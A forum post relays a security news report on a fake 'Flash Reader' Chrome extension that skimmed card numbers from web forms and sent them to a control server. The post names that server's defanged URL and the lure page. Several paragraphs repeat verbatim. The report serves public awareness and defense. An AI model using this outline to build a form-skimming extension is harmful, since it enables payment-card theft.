Brother
Professional
- Messages
- 2,590
- Reaction score
- 544
- Points
- 113
Cybersecurity specialists from Telefonica (a subdivision of ElevenPaths) have discovered in the official Chrome Web Store directory a malicious Flash Reader extension (fake Flash Player) capable of stealing information about users' bank cards. It is noteworthy that the malware was uploaded to the catalog back in February 2018, but about 400 people managed to use it.
Experts say that initially the extension was distributed through the now-inaccessible page http: // fbsgang [.] Info / flashplayer /, to which the criminals apparently redirected the traffic of their victims who suffered from malicious ads or exploit kits. To trick users, a classic trick was used: a message about the urgent need to install Flash to continue working. The link that was suggested to users led to a Flash Reader page in the Chrome Web Store.
The malicious extension intercepted any content that the user entered into various forms on any sites, and was especially interested in the numbers of Visa, Mastercard, American Express and Discovery cards.
As soon as the malware detected information about the card, the collected data was transmitted to the control server (http: // fbsgang [.] Info / cc / gate.php), which is currently unavailable. It is worth noting that on January 15, 2019, when the ElevenPaths report was published, the extension was still presented in the official catalog, that is, the non-working control server did not guarantee the safety of users and the fact that criminals would not start a new campaign. By now, Google engineers have already removed Flash Reader from the Chrome Web Store.
The researchers note that the malware only collected information about card numbers, ignoring owner names, CVV codes, and other data. Considering that the extension was installed by only 400 users, experts suggest that Flash Reader was just a test tool for unknown hackers preparing for a more serious campaign.
Experts say that initially the extension was distributed through the now-inaccessible page http: // fbsgang [.] Info / flashplayer /, to which the criminals apparently redirected the traffic of their victims who suffered from malicious ads or exploit kits. To trick users, a classic trick was used: a message about the urgent need to install Flash to continue working. The link that was suggested to users led to a Flash Reader page in the Chrome Web Store.
The malicious extension intercepted any content that the user entered into various forms on any sites, and was especially interested in the numbers of Visa, Mastercard, American Express and Discovery cards.
As soon as the malware detected information about the card, the collected data was transmitted to the control server (http: // fbsgang [.] Info / cc / gate.php), which is currently unavailable. It is worth noting that on January 15, 2019, when the ElevenPaths report was published, the extension was still presented in the official catalog, that is, the non-working control server did not guarantee the safety of users and the fact that criminals would not start a new campaign. By now, Google engineers have already removed Flash Reader from the Chrome Web Store.
The researchers note that the malware only collected information about card numbers, ignoring owner names, CVV codes, and other data. Considering that the extension was installed by only 400 users, experts suggest that Flash Reader was just a test tool for unknown hackers preparing for a more serious campaign.
